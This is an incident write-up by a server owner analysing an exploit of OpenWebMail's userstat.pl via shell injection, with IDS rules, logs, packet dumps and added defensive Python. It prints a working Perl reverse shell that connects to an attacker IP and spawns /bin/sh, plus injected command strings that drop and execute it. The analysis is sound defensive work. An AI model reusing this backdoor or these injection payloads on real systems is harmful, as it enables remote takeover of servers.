Gwee used to exploit userstat.pl on mnin.org webmail



Last Updated: Tuesday August 24, 2004

Michael Ligh


Table of Contents

  1. The First Gwee Episode: Explanation & Documentation
  2. The Second Gwee Episode: Packet Captures
  3. References

i. The First Gwee Episode

Well, here's the story from a new perspective: investigating my own hacked system. Not as funny as the others, but definitely more exciting and interesting.

Let's start from the beginning. Between midnight and 3 AM on 8/18/2004, traffic flowing from client to server tripped 3 IDS alerts (2 unique). The rules that fired were:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-ATTACKS perl execution attempt"; flow:to_server,established; content:"perl%20"; nocase; classtype:web-application-attack; sid:1356; rev:5;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-ATTACKS perl execution attempt"; flow:to_server,established; content:"perl%20"; nocase; classtype:web-application-attack; sid:1356; rev:5;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-ATTACKS rm command attempt"; flow:to_server,established; content:"rm%20"; nocase; classtype:web-application-attack; sid:1365; rev:5;)

You can see an attempt was made from one address as early as midnight. The second set of alerts came from another source address almost 3 hours later. It was unfortunate, but not surprising, to dig up the payload contents of the packets that set off those alerts. Here are the HTTP headers:

POST /cgi-bin/openwebmail/userstat.pl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: mnin.ods.org
Pragma: no-cache
Connection: close
Content-Length: 2143
Content-Type: application/x-www-form-urlencoded

Then come the URL-encoded (percent-encoded) parameters:

...loginname=2%3E/dev/null%3Bperl%20-e%20%22print%20%5C%22%5C043%...

A bunch of junk, huh? What this first packet did was submit a perl script to an executable openwebmail component named userstat.pl, which does no filtering of shell metacharacters in its input data. It is a known vulnerability that has since been patched by the authors; however, the version on my server had not been updated.

In particular, according to SecuriTeam, [1] "the script doesn't properly filter out shell characters from the loginname parameter. The loginname parameter is used as an argument when executing openwebmail-tool.pl from the vulnerable script. By adding a ";", "|" or "( )" followed by the shell command to a http GET, HEAD or POST request an attacker can execute arbitrary system commands."
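The advisory's point is that the parameter is pasted into a command line a shell parses, so a ";" or "|" ends the intended command and starts the attacker's. The following is an added example (not OpenWebMail's code, nor the author's) showing that pattern beside the hardened form: an allowlist check on the login name and an argv list handed to the helper with no shell in between. The TOOL path, the argument syntax and the allowlist policy are assumptions made for the illustration.

```python
import re
import subprocess

# Stand-in path for the helper that userstat.pl hands the login name to.
# The real OpenWebMail argument syntax is not reproduced here (assumption).
TOOL = "/usr/local/www/cgi-bin/openwebmail/openwebmail-tool.pl"

# Allowlist for a login name: letters, digits, '_', '.', '-', 1..32 chars.
# This policy is an assumption for the example, not OpenWebMail's own rule.
LOGINNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")

# The characters the advisory names, plus the usual suspects, for reporting.
SHELL_META = frozenset(';|&()<>`$\n')


def loginname_is_safe(loginname: str) -> bool:
    """True if the value matches the allowlist. Anything else is rejected
    outright rather than 'cleaned', so nothing reaches a shell by accident."""
    return LOGINNAME_RE.match(loginname) is not None


def metachars_in(loginname: str) -> str:
    """Shell metacharacters present in the value, in the order seen (for logs)."""
    return "".join(c for c in loginname if c in SHELL_META)


def build_shell_command_vulnerable(loginname: str) -> str:
    """The pattern the advisory describes: the parameter is interpolated into
    one command string that a shell later parses, so ';' or '|' inside it
    become command separators. Returned for inspection only; never executed."""
    return "%s %s" % (TOOL, loginname)


def build_argv_hardened(loginname: str) -> list:
    """Validate first, then pass the value as a single argv element. With no
    shell in the path, ';' or '|' inside the value are just bytes of an
    argument, not command separators."""
    if not loginname_is_safe(loginname):
        raise ValueError("loginname rejected, contains %r"
                         % (metachars_in(loginname) or "disallowed characters"))
    return [TOOL, loginname]


def hardened_rejects(loginname: str) -> bool:
    """Convenience check: does the hardened path refuse this value?"""
    try:
        build_argv_hardened(loginname)
    except ValueError:
        return True
    return False


def run_tool_hardened(loginname: str) -> int:
    """How the argv form is used for real: subprocess.run with a list and
    shell=False. Not called in this example because TOOL does not exist here."""
    argv = build_argv_hardened(loginname)
    return subprocess.run(argv, shell=False, check=False).returncode
```

Rejecting on an allowlist is deliberate: stripping the characters the advisory lists would still leave the next metacharacter nobody thought of, whereas a value that fails the allowlist never reaches the helper at all.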

There are several other advisories online and even more example exploit scripts. In this case, it is pretty clear what was used to generate the attack (gwee), based on the payload contents of the packet that set off the 3rd IDS alert:

loginname=2%3E/dev/null%3Brm%20%2Df%20/var/tmp/.vetx.95

Or decoded:

loginname=2>/dev/null;rm -f /var/tmp/.vetx.95

This is the tail end of the command being fed to userstat.pl: stderr is redirected to /dev/null and the temporary file is removed. Finding this packet was my cue to check whether /var/tmp/.vetx.95 was present on the filesystem, while still unsure whether this was a false positive. Things unfolded when I mistyped the path and ended up printing the directory listing for /tmp instead of /var/tmp. There I found an executable perl script named w00t that contained socket code to connect back to the attacker on ports 999 and 7700 and spawn a shell. It looked like this:

#!/usr/bin/perl
use Socket;
use IO::Handle;
use POSIX;
$proto = getprotobyname('tcp');
socket(Socket_Handle, AF_INET, SOCK_STREAM, $proto);
# connect back to the attacker's host on port 999
$sin = sockaddr_in(999, inet_aton("202.130.135.153"));
connect(Socket_Handle, $sin);
# attach stdin, stdout and stderr to the socket
dup2(Socket_Handle->fileno, 0);
dup2(Socket_Handle->fileno, 1);
dup2(Socket_Handle->fileno, 2);
# hand the connection to a shell
exec { "/bin/sh" } "";
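The captured POST body is encoded twice: once as a percent-encoded form field, and inside that as perl \NNN octal escapes for the bytes of the script that `print` writes out to /tmp/w00t. The decoder below is an added example (not part of the original write-up) that peels both layers so an analyst can go from the hex dump back to the file found in /tmp. The two CAPTURED_* strings are fragments copied from the page's hex dump and joined onto single lines; the first is deliberately truncated.

```python
import re
from urllib.parse import unquote

# Two fragments of the captured POST body, copied from the hex dump on this
# page and joined back into single lines. The first is the start of the
# injected loginname (truncated here); the second is the tail that set off
# the third IDS alert.
CAPTURED_HEAD = (
    "loginname=2%3E/dev/null%3Bperl%20-e%20%22print%20%5C%22"
    "%5C043%5C041%5C057%5C165%5C163%5C162%5C057%5C142%5C151%5C156"
    "%5C057%5C160%5C145%5C162%5C154%5C012"
    "%5C165%5C163%5C145%5C040%5C123%5C157%5C143%5C153%5C145%5C164%5C073"
)
CAPTURED_TAIL = "loginname=2%3E/dev/null%3Brm%20%2Df%20/var/tmp/.vetx.95"

_OCTAL_ESCAPE = re.compile(r"\\([0-7]{3})")
# perl -e "print \"...\"": capture everything after print \" up to the
# closing \" (or the end of a truncated capture)
_PRINT_ARG = re.compile(r'print \\"(.*?)(?:\\"|$)', re.S)


def form_fields(body: str) -> dict:
    """Split an application/x-www-form-urlencoded body, percent-decoding
    names and values. Layer 1 of the encoding."""
    fields = {}
    for pair in body.split("&"):
        if "=" in pair:
            name, value = pair.split("=", 1)
            fields[unquote(name)] = unquote(value)
    return fields


def injected_command(body: str) -> str:
    """The shell text smuggled in through the loginname parameter."""
    return form_fields(body).get("loginname", "")


def octal_unescape(text: str) -> str:
    """Layer 2: perl's \\NNN octal escapes. Encoding the script this way keeps
    it free of characters that the CGI or the shell would otherwise mangle."""
    return _OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), text)


def recover_dropped_script(body: str) -> str:
    """Return the file content that the injected perl -e 'print ...' writes
    out; empty string if the body carries no such command."""
    cmd = injected_command(body)
    m = _PRINT_ARG.search(cmd)
    if m is None:
        return ""
    return octal_unescape(m.group(1))
```

Run against the head fragment this yields the first two lines of the w00t script shown above ("#!/usr/bin/perl" and "use Socket;"), which is the quickest way to confirm that the file on disk and the payload in the capture are the same thing.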

It was now a fact that an attacker had exploited something in order to write a file into the /tmp directory. At this point it was still uncertain exactly what had been exploited and whether the file had been executed. That changed fast as soon as I viewed the egress filtering logs: the script was indeed executed, as evidenced by the following dropped traffic:

Aug 18 00:00:36 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=202.130.135.153 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=60196 DF PROTO=TCP SPT=43102 DPT=999 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 00:00:39 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=202.130.135.153 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=60198 DF PROTO=TCP SPT=43102 DPT=999 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 00:00:45 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=202.130.135.153 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=60241 DF PROTO=TCP SPT=43102 DPT=999 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 00:00:57 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=202.130.135.153 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=60243 DF PROTO=TCP SPT=43102 DPT=999 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 00:01:21 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=202.130.135.153 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=60307 DF PROTO=TCP SPT=43102 DPT=999 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 00:02:09 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=202.130.135.153 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=61281 DF PROTO=TCP SPT=43102 DPT=999 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 02:46:04 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=130.233.30.237 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=64581 DF PROTO=TCP SPT=43153 DPT=7700 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 02:46:07 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=130.233.30.237 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=64582 DF PROTO=TCP SPT=43153 DPT=7700 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 02:46:13 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=130.233.30.237 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=64591 DF PROTO=TCP SPT=43153 DPT=7700 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 02:46:25 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=130.233.30.237 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=64592 DF PROTO=TCP SPT=43153 DPT=7700 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 02:46:49 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=130.233.30.237 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=64593 DF PROTO=TCP SPT=43153 DPT=7700 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 02:47:37 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=130.233.30.237 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=64629 DF PROTO=TCP SPT=43153 DPT=7700 WINDOW=5840 RES=0x00 SYN URGP=0

Fortunately the attacker never got the backdoor up and running, thanks to the outbound filtering in place. If that ever changes, you might see 'investigating my own hacked system part II'. Anyway, I mentioned earlier that a program named Gwee [2] was probably responsible for the attack, based on a keyword found in the second packet. The file named vetx.95 is associated with gwee, as found in its man page:

-T /var/tmp/.vetx.95 Choose a different temporary filename for the shellcode/backdoor on the target than the default.

It makes even more sense once you know that gwee stands for Generic Web Exploitation Engine, described by its authors as "a small program written in C designed to exploit input validation vulnerabilities in web scripts, such as Perl CGIs, PHP, etc".

Conveniently, there is a pre-written script especially for OpenWebMail's vulnerable userstat.pl [3]. That pretty much wraps up this incident. Hopefully it won't happen again, but if it does, I'll have fun writing about it.

ii. The Second Gwee Episode: Packet Captures

Just for verification and log correlation, here is the whole attempt over again. Why, all of a sudden, would this attack, which has existed for over a year, become so common? Thanks to Matt, there is at least one rational explanation. Search engines indexing a web site keep records of its pages and content. When people want to try an exploit, they no longer have to guess which domains host particular files; they can just Google them!

Here are the Apache (cough, cough, I mean the web server that's not Apache's) access logs:

62.111.240.132 - - [13/Sep/2004:15:05:30 -0400] "POST /cgi-bin/openwebmail/userstat.pl HTTP/1.1" 200 3 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
62.111.240.132 - - [13/Sep/2004:15:05:39 -0400] "GET /cgi-bin/openwebmail/userstat.pl?loginname=|chmod%20755%20/tmp/w00t HTTP/1.0" 200 3 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
62.111.240.132 - - [13/Sep/2004:15:05:47 -0400] "GET /cgi-bin/openwebmail/userstat.pl?loginname=|exec%20/tmp/w00t HTTP/1.0" 200 3 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
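Note what the access log does and does not show: the first request's payload went in a POST body, which the web server never writes to the access log, while the two follow-up GETs put the injected command straight into the query string. The added example below (not the author's tooling) parses these lines, applies the two content matches from the Snort rules quoted in the first episode, and separately decodes each query parameter and looks for shell metacharacters. The three log lines are the ones above; the fourth, with loginname "mligh", is a constructed benign request for contrast.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# The three access-log lines shown above, plus one constructed benign request
# for contrast (the loginname value "mligh" is made up for this example).
ACCESS_LOG = [
    '62.111.240.132 - - [13/Sep/2004:15:05:30 -0400] "POST /cgi-bin/openwebmail/userstat.pl HTTP/1.1" 200 3 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '62.111.240.132 - - [13/Sep/2004:15:05:39 -0400] "GET /cgi-bin/openwebmail/userstat.pl?loginname=|chmod%20755%20/tmp/w00t HTTP/1.0" 200 3 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '62.111.240.132 - - [13/Sep/2004:15:05:47 -0400] "GET /cgi-bin/openwebmail/userstat.pl?loginname=|exec%20/tmp/w00t HTTP/1.0" 200 3 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '10.1.1.50 - - [13/Sep/2004:15:06:02 -0400] "GET /cgi-bin/openwebmail/userstat.pl?loginname=mligh HTTP/1.0" 200 3 "-" "Mozilla/5.0"',
]

# Combined log format: ip ident user [ts] "method target proto" status size "ref" "ua"
_CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# content: strings from the two Snort rules quoted in the first episode (nocase)
SNORT_CONTENT = {"perl%20": 1356, "rm%20": 1365}
SHELL_META = re.compile(r"[;|&`$()<>]")


def parse_clf(line: str):
    """Parse one combined-format access log line; None if it does not match."""
    m = _CLF.match(line)
    return m.groupdict() if m else None


def snort_content_hits(raw: str) -> list:
    """Rule sids whose content: string occurs in the raw, still-encoded text,
    matched case-insensitively like Snort's nocase modifier."""
    low = raw.lower()
    return sorted(sid for pat, sid in SNORT_CONTENT.items() if pat in low)


def shell_injection_hits(target: str) -> list:
    """(param, decoded value) pairs from the query string whose decoded value
    carries shell metacharacters. Decoding first is what makes this catch
    '|chmod 755 ...' when no fixed content: string would."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if SHELL_META.search(v)]


def scan_access_log(lines) -> list:
    """Run both checks over every parsable line; one finding per hit line."""
    findings = []
    for n, line in enumerate(lines, 1):
        rec = parse_clf(line)
        if rec is None:
            continue
        params = shell_injection_hits(rec["target"])
        sids = snort_content_hits(rec["target"])
        if params or sids:
            findings.append({"line": n, "ip": rec["ip"], "method": rec["method"],
                             "params": params, "sids": sids})
    return findings
```

Run over the four lines, only the two GETs are reported, and neither of them triggers sid 1356 or 1365: "chmod%20" and "exec%20" contain neither "perl%20" nor "rm%20". The content matches earn their keep on the POST body, which only the IDS and the packet capture can see; the decoded-metacharacter check is what covers the query-string variants in the access log.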

Here we go, all the way until the end:

09/13-15:05:30.458245 62.111.240.132:36368 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:1298 IpLen:20 DgmLen:60 DF
******S* Seq: 0x899ACEB2  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 763022240 0 NOP WS: 0

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:30.458367 10.1.1.100:80 -> 62.111.240.132:36368
TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0x24126FEB  Ack: 0x899ACEB3  Win: 0x16A0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 1991961816 763022240
TCP Options => NOP WS: 0

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:30.619452 62.111.240.132:36368 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:1299 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x899ACEB3  Ack: 0x24126FEC  Win: 0x16D0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763022259 1991961816

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:30.645368 62.111.240.132:36368 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:1300 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x899ACEB3  Ack: 0x24126FEC  Win: 0x16D0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763022259 1991961816
50 4F 53 54 20 2F 63 67 69 2D 62 69 6E 2F 6F 70  POST /cgi-bin/op
65 6E 77 65 62 6D 61 69 6C 2F 75 73 65 72 73 74  enwebmail/userst
61 74 2E 70 6C 20 48 54 54 50 2F 31 2E 31 0D 0A  at.pl HTTP/1.1..
55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69  User-Agent: Mozi
6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69  lla/4.0 (compati
62 6C 65 3B 20 4D 53 49 45 20 36 2E 30 3B 20 57  ble; MSIE 6.0; W
69 6E 64 6F 77 73 20 4E 54 20 35 2E 31 29 0D 0A  indows NT 5.1)..
48 6F 73 74 3A 20 32 34 2E 32 2E 31 35 33 2E 31  Host: 24.2.153.1
36 38 0D 0A 50 72 61 67 6D 61 3A 20 6E 6F 2D 63  68..Pragma: no-c
61 63 68 65 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E  ache..Connection
3A 20 63 6C 6F 73 65 0D 0A 43 6F 6E 74 65 6E 74  : close..Content
2D 4C 65 6E 67 74 68 3A 20 32 31 34 33 0D 0A 43  -Length: 2143..C
6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70  ontent-Type: app
6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66  lication/x-www-f
6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A  orm-urlencoded..
0D 0A 6C 6F 67 69 6E 6E 61 6D 65 3D 32 25 33 45  ..loginname=2%3E
2F 64 65 76 2F 6E 75 6C 6C 25 33 42 70 65 72 6C  /dev/null%3Bperl
25 32 30 2D 65 25 32 30 25 32 32 70 72 69 6E 74  %20-e%20%22print
25 32 30 25 35 43 25 32 32 25 35 43 30 34 33 25  %20%5C%22%5C043%
35 43 30 34 31 25 35 43 30 35 37 25 35 43 31 36  5C041%5C057%5C16
35 25 35 43 31 36 33 25 35 43 31 36 32 25 35 43  5%5C163%5C162%5C
30 35 37 25 35 43 31 34 32 25 35 43 31 35 31 25  057%5C142%5C151%
35 43 31 35 36 25 35 43 30 35 37 25 35 43 31 36  5C156%5C057%5C16
30 25 35 43 31 34 35 25 35 43 31 36 32 25 35 43  0%5C145%5C162%5C
31 35 34 25 35 43 30 31 32 25 35 43 31 36 35 25  154%5C012%5C165%
35 43 31 36 33 25 35 43 31 34 35 25 35 43 30 34  5C163%5C145%5C04
30 25 35 43 31 32 33 25 35 43 31 35 37 25 35 43  0%5C123%5C157%5C
31 34 33 25 35 43 31 35 33 25 35 43 31 34 35 25  143%5C153%5C145%
35 43 31 36 34 25 35 43 30 37 33 25 35 43 30 34  5C164%5C073%5C04
30 25 35 43 31 36 35 25 35 43 31 36 33 25 35 43  0%5C165%5C163%5C
31 34 35 25 35 43 30 34 30 25 35 43 31 31 31 25  145%5C040%5C111%
35 43 31 31 37 25 35 43 30 37 32 25 35 43 30 37  5C117%5C072%5C07
32 25 35 43 31 31 30 25 35 43 31 34 31 25 35 43  2%5C110%5C141%5C
31 35 36 25 35 43 31 34 34 25 35 43 31 35 34 25  156%5C144%5C154%
35 43 31 34 35 25 35 43 30 37 33 25 35 43 30 34  5C145%5C073%5C04
30 25 35 43 31 36 35 25 35 43 31 36 33 25 35 43  0%5C165%5C163%5C
31 34 35 25 35 43 30 34 30 25 35 43 31 32 30 25  145%5C040%5C120%
35 43 31 31 37 25 35 43 31 32 33 25 35 43 31 31  5C117%5C123%5C11
31 25 35 43 31 33 30 25 35 43 30 37 33 25 35 43  1%5C130%5C073%5C
30 34 30 25 35 43 30 34 34 25 35 43 31 36 30 25  040%5C044%5C160%
35 43 31 36 32 25 35 43 31 35 37 25 35 43 31 36  5C162%5C157%5C16
34 25 35 43 31 35 37 25 35 43 30 34 30 25 35 43  4%5C157%5C040%5C
30 37 35 25 35 43 30 34 30 25 35 43 31 34 37 25  075%5C040%5C147%
35 43 31 34 35 25 35 43 31 36 34 25 35 43 31 36  5C145%5C164%5C16
30 25 35 43 31 36 32 25 35 43 31 35 37 25 35 43  0%5C162%5C157%5C
31 36 34 25 35 43 31 35 37 25 35 43 31 34 32 25  164%5C157%5C142%
35 43 31 37 31 25 35 43 31 35 36 25 35 43 31 34  5C171%5C156%5C14
31 25 35 43 31 35 35 25 35 43 31 34 35 25 35 43  1%5C155%5C145%5C
30 35 30 25 35 43 30 34 37 25 35 43 31 36 34 25  050%5C047%5C164%
35 43 31 34 33 25 35 43 31 36 30 25 35 43 30 34  5C143%5C160%5C04
37 25 35 43 30 35 31 25 35 43 30 37 33 25 35 43  7%5C051%5C073%5C
30 34 30 25 35 43 31 36 33 25 35 43 31 35 37 25  040%5C163%5C157%
35 43 31 34 33 25 35 43 31 35 33 25 35 43 31 34  5C143%5C153%5C14
35 25 35 43 31 36 34 25 35 43 30 35 30 25 35 43  5%5C164%5C050%5C
31 32 33 25 35 43 31 35 37 25 35 43 31 34 33 25  123%5C157%5C143%
35 43 31 35 33 25 35 43 31 34 35 25 35 43 31 36  5C153%5C145%5C16
34 25 35 43 31 33 37 25 35 43 31 31 30 25 35 43  4%5C137%5C110%5C
31 34 31 25 35 43 31 35 36 25 35 43 31 34 34 25  141%5C156%5C144%
35 43 31 35 34 25 35 43 31 34 35 25 35 43 30 35  5C154%5C145%5C05
34 25 35 43 30 34 30 25 35 43 31 30 31 25 35 43  4%5C040%5C101%5C
31 30 36 25 35 43 31 33 37 25 35 43 31 31 31 25  106%5C137%5C111%
35 43 31 31 36 25 35 43 31 30 35 25 35 43 31 32  5C116%5C105%5C12
34 25 35 43 30 35 34 25 35 43 30 34 30 25 35 43  4%5C054%5C040%5C
31 32 33 25 35 43 31 31 37 25 35 43 31 30 33 25  123%5C117%5C103%
35 43 31 31 33 25 35 43 31 33 37 25 35 43 31 32  5C113%5C137%5C12
33 25 35 43 31 32 34 25 35 43 31 32 32 25 35 43  3%5C124%5C122%5C
31 30 35 25 35 43 31 30 31 25 35 43 31 31 35 25  105%5C101%5C115%
35 43 30 35 34 25 35 43 30 34 30 25 35 43 30 34  5C054%5C040%5C04
34 25 35 43 31 36 30 25 35 43 31 36 32 25 35 43  4%5C160%5C162%5C
31 35 37 25 35 43 31 36 34 25 35 43 31 35 37 25  157%5C164%5C157%
35 43 30 35 31 25 35 43 30 37 33 25 35 43 30 34  5C051%5C073%5C04
30 25 35 43 30 34 34 25 35 43 31 36 33 25 35 43  0%5C044%5C163%5C
31 35 31 25 35 43 31 35 36 25 35 43 30 34 30 25  151%5C156%5C040%
35 43 30 37 35 25 35 43 30 34 30 25 35 43 31 36  5C075%5C040%5C16
33 25 35 43 31 35 37 25 35 43 31 34 33 25 35 43  3%5C157%5C143%5C
31 35 33 25 35 43 31 34 31 25 35 43 31 34 34 25  153%5C141%5C144%
35 43 31 34 34 25 35 43 31 36 32 25 35 43 31 33  5C144%5C162%5C13
37 25 35 43 31 35 31 25 35 43 31 35 36 25 35 43  7%5C151%5C156%5C
30 35 30 25 35 43 30 37 30 25 35 43 30 36 30 25  050%5C070%5C060%
35 43 30 37 30 25 35 43 30 36 30 25 35 43 30 34  5C070%5C060%5C04
30 25 35 43 30 35 34 25 35 43 31 35 31 25 35 43  0%5C054%5C151%5C
31 35 36 25 35 43 31 34 35 25 35 43 31 36 34 25  156%5C145%5C164%
35 43 31 33 37 25 35 43 31 34 31 25 35 43 31 36  5C137%5C141%5C16
34 25 35 43 31 35 37 25 35 43 31 35 36 25 35 43  4%5C157%5C156%5C
30 35 30 25 35 43 30 34 32 25 35 43 30 36 36 25  050%5C042%5C066%
35 43 30 36 32 25 35 43 30 35 36 25 35 43 30 36  5C062%5C056%5C06
31 25 35 43 30 36 31 25 35 43 30 36 31 25 35 43  1%5C061%5C061%5C
30 35 36 25 35 43 30 36 32 25 35 43 30 36 34 25  056%5C062%5C064%
35 43 30 36 30 25 35 43 30 35 36 25 35 43 30 36  5C060%5C056%5C06
31 25 35 43 30 36 33 25 35 43 30 36 30 25 35 43  1%5C063%5C060%5C
30 34 32 25 35 43 30 34                          042%5C04

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:30.645406 10.1.1.100:80 -> 62.111.240.132:36368
TCP TTL:64 TOS:0x0 ID:33429 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x24126FEC  Ack: 0x899AD45B  Win: 0x21F0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991962003 763022259

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:30.660420 62.111.240.132:36368 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:1301 IpLen:20 DgmLen:993 DF
***AP*** Seq: 0x899AD45B  Ack: 0x24126FEC  Win: 0x16D0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763022259 1991961816
30 25 35 43 30 35 31 25 35 43 30 35 31 25 35 43  0%5C051%5C051%5C
30 37 33 25 35 43 30 34 30 25 35 43 31 34 33 25  073%5C040%5C143%
35 43 31 35 37 25 35 43 31 35 36 25 35 43 31 35  5C157%5C156%5C15
36 25 35 43 31 34 35 25 35 43 31 34 33 25 35 43  6%5C145%5C143%5C
31 36 34 25 35 43 30 35 30 25 35 43 31 32 33 25  164%5C050%5C123%
35 43 31 35 37 25 35 43 31 34 33 25 35 43 31 35  5C157%5C143%5C15
33 25 35 43 31 34 35 25 35 43 31 36 34 25 35 43  3%5C145%5C164%5C
31 33 37 25 35 43 31 31 30 25 35 43 31 34 31 25  137%5C110%5C141%
35 43 31 35 36 25 35 43 31 34 34 25 35 43 31 35  5C156%5C144%5C15
34 25 35 43 31 34 35 25 35 43 30 35 34 25 35 43  4%5C145%5C054%5C
30 34 34 25 35 43 31 36 33 25 35 43 31 35 31 25  044%5C163%5C151%
35 43 31 35 36 25 35 43 30 35 31 25 35 43 30 37  5C156%5C051%5C07
33 25 35 43 30 34 30 25 35 43 31 34 34 25 35 43  3%5C040%5C144%5C
31 36 35 25 35 43 31 36 30 25 35 43 30 36 32 25  165%5C160%5C062%
35 43 30 35 30 25 35 43 31 32 33 25 35 43 31 35  5C050%5C123%5C15
37 25 35 43 31 34 33 25 35 43 31 35 33 25 35 43  7%5C143%5C153%5C
31 34 35 25 35 43 31 36 34 25 35 43 31 33 37 25  145%5C164%5C137%
35 43 31 31 30 25 35 43 31 34 31 25 35 43 31 35  5C110%5C141%5C15
36 25 35 43 31 34 34 25 35 43 31 35 34 25 35 43  6%5C144%5C154%5C
31 34 35 25 35 43 30 35 35 25 35 43 30 37 36 25  145%5C055%5C076%
35 43 31 34 36 25 35 43 31 35 31 25 35 43 31 35  5C146%5C151%5C15
34 25 35 43 31 34 35 25 35 43 31 35 36 25 35 43  4%5C145%5C156%5C
31 35 37 25 35 43 30 35 34 25 35 43 30 34 30 25  157%5C054%5C040%
35 43 30 36 30 25 35 43 30 35 31 25 35 43 30 37  5C060%5C051%5C07
33 25 35 43 30 34 30 25 35 43 31 34 34 25 35 43  3%5C040%5C144%5C
31 36 35 25 35 43 31 36 30 25 35 43 30 36 32 25  165%5C160%5C062%
35 43 30 35 30 25 35 43 31 32 33 25 35 43 31 35  5C050%5C123%5C15
37 25 35 43 31 34 33 25 35 43 31 35 33 25 35 43  7%5C143%5C153%5C
31 34 35 25 35 43 31 36 34 25 35 43 31 33 37 25  145%5C164%5C137%
